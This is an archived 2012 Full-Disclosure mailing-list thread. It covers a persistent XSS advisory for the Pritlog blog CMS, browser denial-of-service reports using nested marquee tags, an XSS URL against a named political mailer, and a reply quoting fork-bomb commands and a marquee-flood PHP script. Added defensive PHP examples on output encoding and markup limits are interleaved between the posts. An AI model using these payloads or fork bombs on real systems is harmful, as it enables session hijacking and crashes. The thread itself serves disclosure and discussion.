[Full-disclosure] Pritlog v0.821 CMS - Multiple Web Vulnerabilities

2012-04-30 Thread Research
Title:
==
Pritlog v0.821 CMS - Multiple Web Vulnerabilities


Date:
=
2012-04-29


References:
===
http://www.vulnerability-lab.com/get_content.php?id=534


VL-ID:
=
534


Introduction:
=
PRITLOG is an extremely simple, small ( 500K uncompressed) and powerful blog 
system. It does not use or need 
a MYSQL database and fully works based on Sqlite. Sqlite is very similar to 
flat files and does not need any 
server setup and comes as default with most PHP5 installations. Just drop 
Pritlog into your server and it 
starts running. No separate installation is required.

Feature(s):
* WYSIWYG editor - nicEdit
* Admin interface (change site properties, add authors, change 
password)
* Easy translation. Language selection available in the admin panel. Language 
files must be created.
* Sticky Posts
* Integrated login system with registration
* Pretty Urls
* SEO Optimization
* Page functionality for static pages
* Social Bookmarking widget: to enable easy sharing of post/blog
* Bbcode by editing html (work around)
* RSS Feeds
* Additional authors can be added by the admin
* Post Options w/ Teaser + Full Story (using *readmore* in the post)
* Ability to enable / disable comments per post * Global privacy option
* Ajax and jQuery for better user experience
* Post auto-save feature
* Category cloud
* Theme engine for easy theme creation
* Plugins to easily add functionality 


(Copy of the Vendor Homepage: http://pritlog.com/fossil.cgi/taglist )


Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple Web 
Vulnerabilities in Pritlog v0.821 Content Management System.


Report-Timeline:

2012-04-29: Public or Non-Public Disclosure


Status:

Published


Exploitation-Technique:
===
Remote


Severity:
=
Medium


Details:

Multiple persistent input validation vulnerabilities are detected in the 
Pritlog v0.821 Content Management System. The bugs 
allow remote attackers to implement/inject malicious script code on the 
application side (persistent). Successful exploitation 
of the vulnerability can lead to session hijacking (manager/admin) or stable 
(persistent) context manipulation. Exploitation requires 
low user interaction. Attackers can inject malicious strings as the author name, 
which execute when an admin previews, reviews 
or manages the listing of users. The bug is located on the application side and the 
execution is persistent out of the user management web 
application context.

Vulnerable Module(s):
[+] Manage User Listing - Username & Author

Picture(s):
../1.png
../2.png


Proof of Concept:
=
The vulnerability can be exploited by remote attackers with low required user 
interaction. For demonstration or to reproduce:

URL: http://127.0.0.1:1337/pritlog/index.php/adminPageAuthors

<fieldset>
<legend>Manage Authors</legend>
<table>
<tbody><tr><td><strong>Author: </strong><iframe src=a onload='alert(vl)'>
<br></td>
<td><label for="authorEmail">Email</label><br>
<input type="text" name="authorEmail" id="authorEmail" 
value="f...@aol.com"></td></tr>


Risk:
=
The security risk of the persistent input validation vulnerability is estimated 
as medium.


Credits:

Vulnerability Laboratory [Research Team] - Chokri Ben Achor 
(meis...@vulnerability-lab.com)


Disclaimer:
===
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have 
been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential 
or incidental damages so the foregoing limitation 
may not apply. Any modified copy or reproduction, including partially usages, 
of this file requires authorization from Vulnerability-
Lab. Permission to electronically redistribute this alert in its unmodified 
form is granted. All other rights, including the use of 
other media, are reserved by Vulnerability-Lab or its suppliers.

Copyright © 2012 Vulnerability-Lab




-- 
VULNERABILITY RESEARCH LABORATORY TEAM
Website: www.vulnerability-lab.com
Mail: resea...@vulnerability-lab.com


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
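The persistent XSS in the advisory above is the textbook pattern of a stored value (the author name) being written into the admin "Manage Authors" page without output encoding. As an added example that is not Pritlog's code nor the advisory's, here is that vulnerable rendering pattern beside a hardened version in PHP. The function names, the sample author record and the self-check are assumptions made for the illustration; only the field name authorEmail echoes the PoC.

```php
<?php
// Added example (not Pritlog's code): rendering a stored author name into an
// admin "Manage Authors" table row, first the unsafe way, then with contextual
// output encoding. Function names and the sample record are made up here.

declare(strict_types=1);

// Constructed sample record: the author name carries an attempted markup payload
// of the same shape as the advisory's PoC (a tag with an event handler).
const SAMPLE_AUTHOR = [
    'name'  => 'Mallory <iframe src=a onload=alert(1)>',
    'email' => 'author@example.invalid',
];

// Vulnerable pattern: the stored value is concatenated straight into HTML, so
// whatever was saved as the author name becomes markup in the admin's browser.
function render_author_row_unsafe(array $author): string
{
    return '<tr><td><strong>Author: </strong>' . $author['name'] . '</td>'
         . '<td><input type="text" name="authorEmail" value="' . $author['email'] . '"></td></tr>';
}

// Encode for an HTML text node or a quoted attribute value. ENT_QUOTES covers both
// quote styles so the same helper is safe inside attributes; ENT_SUBSTITUTE avoids
// returning an empty string on invalid UTF-8 (which would silently drop data).
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: every untrusted value passes through h() at the output point.
function render_author_row(array $author): string
{
    return '<tr><td><strong>Author: </strong>' . h($author['name']) . '</td>'
         . '<td><input type="text" name="authorEmail" value="' . h($author['email']) . '"></td></tr>';
}

// Input-side check an admin form can apply on top of output encoding: author
// names are display strings, so markup characters have no business in them.
function is_acceptable_author_name(string $name): bool
{
    return strlen($name) <= 64 && preg_match('/[<>"\'&]/', $name) !== 1;
}

// Self-check: the unsafe row carries the tag through, the hardened row does not.
function self_check(): bool
{
    $unsafe = render_author_row_unsafe(SAMPLE_AUTHOR);
    $safe   = render_author_row(SAMPLE_AUTHOR);
    return strpos($unsafe, '<iframe') !== false
        && strpos($safe, '<iframe') === false
        && strpos($safe, '&lt;iframe src=a onload=alert(1)&gt;') !== false
        && !is_acceptable_author_name(SAMPLE_AUTHOR['name'])
        && is_acceptable_author_name('Alice Example');
}

echo self_check() ? "output encoding check passed\n" : "output encoding check FAILED\n";
```

The encoding belongs at the output point, not at storage time: the same author name may later be emitted into a JSON response or an RSS feed, each of which needs its own encoding, and encoding once on input cannot serve all of them. The input-side check is a second layer; it does not replace the output encoding.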


[Full-disclosure] DoS vulnerabilities in Firefox, Internet Explorer and Opera

2012-04-30 Thread MustLive
Hello list!

I want to warn you about a Denial of Service vulnerability in Mozilla Firefox, 
Internet Explorer and Opera. Earlier, a DoS vulnerability in the 
browser Opera 10.10 found by Inj3ct0r was published 
(http://securityvulns.com/news/Opera/1002.html). Some time ago I checked 
this exploit and found that many other browsers are vulnerable to this attack.

These are Denial of Service vulnerabilities in Mozilla Firefox, Microsoft 
Internet Explorer and Opera. They belong to the types 
(http://websecurity.com.ua/2550/) crashing DoS, blocking DoS and resource 
consumption DoS.

The exploit from Inj3ct0r is similar to the exploits which I made for 
Google Chrome (for my project Day of bugs in Google Chrome) and Mozilla 
Firefox in 2008. The attack in my exploits was conducted via a large number of 
nested marquee tags, and in his case the html, marquee and h1 tags were used. 
But the essence is the same - a large number of nested tags (particularly 
marquee). At that time I informed Google and Mozilla and filed Bug 454434 
(https://bugzilla.mozilla.org/show_bug.cgi?id=454434) in Bugzilla, but while 
Google fixed the hole, Mozilla hasn't fixed this vulnerability.

-
Affected products:
-

Vulnerable are Mozilla Firefox 3.0.19, 3.5.11, 3.6.8, 4.0 beta 2, 11.0, 
Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), 
Internet Explorer 8 (8.00.6001.18702) and Opera 10.62, and previous versions of 
these browsers must also be vulnerable. Other browsers can be vulnerable as 
well.

--
Details:
--

DoS (WASC-10):

This is my version of the exploit for different browsers.

http://websecurity.com.ua/uploads/2012/Firefox,%20IE%20%20Opera%20DoS%20Exploit.html

This exploit uses JS, but the attack can also be conducted without JS - as shown 
in my 2008 exploit 
(http://websecurity.com.ua/uploads/2008/Firefox%203%20DoS%20Exploit.html).

This exploit works in the following way:

* Mozilla Firefox 3.0.19 consumes resources (50% CPU and a lot of RAM) and 
crashes.
* Mozilla Firefox 3.5.11 consumes resources (50% CPU and a lot of RAM) and 
crashes.
* Mozilla Firefox 3.6.8 consumes resources (50% CPU and a lot of RAM) and 
crashes.
* Mozilla Firefox 4.0 beta 2 freezes and consumes resources (50% CPU and a lot 
of RAM).
* Mozilla Firefox 11.0 freezes and consumes resources (50% CPU and a lot of 
RAM).
* Internet Explorer 6 freezes and consumes resources (50% CPU and a lot of RAM).
* Internet Explorer 7 freezes and consumes resources (50% CPU and a lot of RAM).
* Internet Explorer 8 only consumes resources (50% CPU and a lot of RAM). I.e. 
in IE8 the problem was partly fixed by Microsoft.
* Opera 10.62 freezes and consumes resources (50% CPU and a lot of RAM).
* The exploit no longer works in Google Chrome since version 
1.0.154.48. Google fixed the marquee tag vulnerability after I informed them in 
2008.


Timeline:
 

2012.04.23 - disclosed at my site (http://websecurity.com.ua/5808/).
2012.04.24 - reminded Mozilla that they still hadn't fixed the 2008 hole.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
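Browser vendors fix the layout engine side of this, but a site that accepts user-submitted HTML (comments, posts, profile fields) can also refuse to store and re-serve pathological markup so it never reaches other visitors' browsers. The following is an added example, not code from MustLive's post, from the replies in this thread or from any browser vendor: a PHP guard that measures both the nesting depth (the nested-marquee case described in this post) and the total tag count (the "a million marquee tags" variant raised later in the thread). The function names, the limits and the constructed samples are this example's own choices.

```php
<?php
// Added example, not code from MustLive's post, the replies or any browser vendor.
// Server-side guard for user-submitted HTML: measures tag nesting depth and total
// tag count so pathological markup (deeply nested or extremely numerous tags such
// as <marquee>) is rejected before it is stored and served to other visitors.
// Function names and the limits are this example's own choices.

declare(strict_types=1);

// Elements that never take a closing tag, so they must not add nesting depth.
const VOID_ELEMENTS = ['area', 'base', 'br', 'col', 'embed', 'hr', 'img', 'input',
                       'link', 'meta', 'param', 'source', 'track', 'wbr'];

// Scan markup and return ['max_depth' => int, 'tag_count' => int].
// A closing tag pops the nearest matching open element (and anything opened after
// it); an unmatched closing tag is ignored, as forgiving HTML parsers do.
function measure_markup(string $html): array
{
    $stack = [];
    $maxDepth = 0;
    $tagCount = 0;
    // Tokenise start and end tags only; text between tags is skipped.
    preg_match_all('/<\s*(\/?)([a-zA-Z][a-zA-Z0-9-]*)[^>]*?(\/?)\s*>/', $html, $matches, PREG_SET_ORDER);
    foreach ($matches as $m) {
        [, $closing, $name, $selfClose] = $m;
        $name = strtolower($name);
        $tagCount++;
        if ($closing === '/') {
            for ($i = count($stack) - 1; $i >= 0; $i--) {
                if ($stack[$i] === $name) {
                    array_splice($stack, $i); // drop it and everything opened after it
                    break;
                }
            }
            continue;
        }
        if ($selfClose === '/' || in_array($name, VOID_ELEMENTS, true)) {
            continue;
        }
        $stack[] = $name;
        $maxDepth = max($maxDepth, count($stack));
    }
    return ['max_depth' => $maxDepth, 'tag_count' => $tagCount];
}

// Policy check: limits chosen to be generous for ordinary blog posts and comments.
function markup_within_limits(string $html, int $maxDepth = 32, int $maxTags = 2000): bool
{
    $m = measure_markup($html);
    return $m['max_depth'] <= $maxDepth && $m['tag_count'] <= $maxTags;
}

// Constructed samples: one normal post, one deeply nested, one flat flood.
function build_nested(string $tag, int $n): string
{
    return str_repeat("<$tag>", $n) . 'x' . str_repeat("</$tag>", $n);
}

function build_flat(string $tag, int $n): string
{
    return str_repeat("<$tag>x</$tag>", $n);
}

function self_check(): bool
{
    $normal = '<p>Hello <b>list</b>!<br></p>';
    $nested = build_nested('marquee', 500);
    $flood  = build_flat('marquee', 5000);
    return markup_within_limits($normal)
        && measure_markup($normal)['max_depth'] === 2
        && measure_markup($nested)['max_depth'] === 500
        && !markup_within_limits($nested)
        && measure_markup($flood)['max_depth'] === 1
        && !markup_within_limits($flood);
}

echo self_check() ? "markup limit check passed\n" : "markup limit check FAILED\n";
```

The scanner is deliberately cheap (a single regex pass and a stack) so it can run on every submission; it is a size and shape limit, not a sanitizer, and belongs in front of whatever HTML sanitizer the application already uses.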

Re: [Full-disclosure] DoS vulnerabilities in Firefox, Internet Explorer and Opera

2012-04-30 Thread Valdis . Kletnieks
On Mon, 30 Apr 2012 15:37:08 +0300, MustLive said:

> * Mozilla Firefox 3.0.19 consumes resources (50% CPU and a lot of RAM) and 
> crashes.
> * Mozilla Firefox 3.5.11 consumes resources (50% CPU and a lot of RAM) and 
> crashes.
> * Mozilla Firefox 3.6.8 consumes resources (50% CPU and a lot of RAM) and 
> crashes.
> * Mozilla Firefox 4.0 beta 2 freezes and consumes resources (50% CPU and a 
> lot of RAM).
> * Mozilla Firefox 11.0 freezes and consumes resources (50% CPU and a lot of 
> RAM).
> * Internet Explorer 6 freezes and consumes resources (50% CPU and a lot of 
> RAM).
> * Internet Explorer 7 freezes and consumes resources (50% CPU and a lot of 
> RAM).
> * Internet Explorer 8 only consumes resources (50% CPU and a lot of RAM). 
> I.e. in IE8 the problem was partly fixed by Microsoft.
> * Opera 10.62 freezes and consumes resources (50% CPU and a lot of RAM).

Anybody want to guess how many cores are on his test box? :)



[Full-disclosure] CWEs translation

2012-04-30 Thread Jerome Athias
Hi list,

I finished the translation into French of all available CWEs (Titles +
Descriptions).
We use it for our CERT.
I should soon share this work with French CERTs, but I would like to
know if others could provide a translation in other languages?
(I know some Spanish guys are working on it)

Thanks
My 5 euro cents

-- 
Jerome Athias - NETpeas
VP, Director of Software Engineer
Palo Alto - Paris - Casablanca
www.netpeas.com
-

The computer security is an art form. It's the ultimate martial art.




[Full-disclosure] XSS in UMP-Sarkozy mailer system

2012-04-30 Thread Jerome Athias
tk3.rylyo.com/14/usb.htm?p=cfmel=jer...@netpeas.comadm=scriptalert('p0wned');/scriptl=fr




Re: [Full-disclosure] DoS vulnerabilities in Firefox, Internet Explorer and Opera

2012-04-30 Thread InterN0T Advisories
Hello list!

I also want to warn you about a Denial of Service vulnerability in almost
every Operating System there is, e.g. by opening a lot of programs at the
same time, or by using fork bombs such as this in the Linux console: :(){
:|: };: (Reference: http://en.wikipedia.org/wiki/Fork_bomb ). In Windows
this bug can be: %0|%0, and in browsers, creating an HTML file that writes a
million marquee tags will also make the browser freeze in most cases with
current computing technology.

Proof of Concept:
<?php
// Secret Leaked MustLive DoS script

$i = 0;
$count = 100;
$omg = "<marquee>Hello list! I want to warn you about vulnerability!</marquee>";

while ($i <= $count):
echo $omg; // -- Send this to FD soon and say it's a bug I discovered a
// couple of years ago to make it look even more cool along with 5 links to my
// website so it can receive more backlinks and a higher page rank hopefully.
$i++;
endwhile;

?>

While this bug can't be fixed, it will always be a problem (in the future
it will just be at larger scales), but as I just stated, it can't be fixed. It
is the same as trying to run Crysis on a Commodore 64: it may be possible,
but your machine will respond as if it is experiencing a Denial of Service
attack, if it doesn't report an error such as Insufficient memory or Out
of memory and crash instead.



To make up for the MustLive linkspam and this reply, here's a few
unrelated links that may interest you:
http://www.wired.com/threatlevel/2012/04/ruggedcom-backdoor/
http://blog.spiderlabs.com/2012/04/pwning-a-spammers-keylogger.html
http://group-ib.com/images/media/Group-IB_Report_2011_ENG.pdf (State and
Trends of the Russian Digital Crime Market)
http://dualcoremusic.com/nerdcore/upload/dual_core-control.mp3 (Dual Core
- Control, it's a song for The Social Engineer Podcast and Chris Hadnagy of
course.)
http://abcnews.go.com/Technology/wireStory/report-iran-unplugs-oil-facilities-internet-16194653#.T58cOcXSoV0

Note that I have absolutely no relation to any of the websites above.



Best regards,
Nemesis 3.0

On Mon, 30 Apr 2012 15:37:08 +0300, MustLive
mustl...@websecurity.com.ua wrote:
> Hello list!
> 
> I want to warn you about Denial of Service vulnerability in Mozilla
> Firefox, Internet Explorer and Opera. Earlier there was published DoS
> vulnerability in browser Opera 10.10 found by Inj3ct0r
> (http://securityvulns.com/news/Opera/1002.html). And some time ago I've
> checked this exploit and found that many other browsers are vulnerable to
> this attack.
> 
> These are Denial of Service vulnerabilities in Mozilla Firefox, Microsoft
> Internet Explorer and Opera. They belong to type
> (http://websecurity.com.ua/2550/) crashing DoS, blocking DoS and resources
> consumption DoS.
> 
> The exploit from Inj3ct0r is similar to the exploits, which I've made for
> Google Chrome (for my project Day of bugs in Google Chrome) and Mozilla
> Firefox in 2008. Attack in my exploits was conducting via large amount of
> nested marquee tags, and in his case the html, marquee and h1 tags were
> used. But the essence is the same - large amount of nested tags
> (particularly marquee). That time I've informed Google and Mozilla and
> placed Bug 454434 (https://bugzilla.mozilla.org/show_bug.cgi?id=454434) in
> Bugzilla, but if Google had fixed the hole, Mozilla hadn't fixed this
> vulnerability.
> 
> -
> Affected products:
> -
> 
> Vulnerable are Mozilla Firefox 3.0.19, 3.5.11, 3.6.8, 4.0 beta 2, 11.0,
> Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13),
> Internet Explorer 8 (8.00.6001.18702) and Opera 10.62, and previous
> versions of these browsers also must be vulnerable. Other browsers can be
> vulnerable as well.
> 
> --
> Details:
> --
> 
> DoS (WASC-10):
> 
> This is my version of the exploit for different browsers.
> 
> http://websecurity.com.ua/uploads/2012/Firefox,%20IE%20%20Opera%20DoS%20Exploit.html
> 
> This exploit uses JS, but attack can be conducted and without JS - as it
> shown in my 2008's exploit
> (http://websecurity.com.ua/uploads/2008/Firefox%203%20DoS%20Exploit.html).
> 
> This exploit works in the following way:
> 
> * Mozilla Firefox 3.0.19 consumes resources (50% CPU and a lot of RAM) and
> crashes.
> * Mozilla Firefox 3.5.11 consumes resources (50% CPU and a lot of RAM) and
> crashes.
> * Mozilla Firefox 3.6.8 consumes resources (50% CPU and a lot of RAM) and
> crashes.
> * Mozilla Firefox 4.0 beta 2 freezes and consumes resources (50% CPU and a
> lot of RAM).
> * Mozilla Firefox 11.0 freezes and consumes resources (50% CPU and a lot
> of RAM).
> * Internet Explorer 6 freezes and consumes resources (50% CPU and a lot of
> RAM).
> * Internet Explorer 7 freezes and consumes resources (50% CPU and a lot of
> RAM).
> * Internet Explorer 8 only consumes resources (50% CPU and a lot of RAM).
> I.e. in IE8 the problem was partly fixed by Microsoft.
> * Opera 10.62 freezes and consumes resources (50% CPU and a lot of RAM).
> * The exploit doesn't work in browser Google Chrome already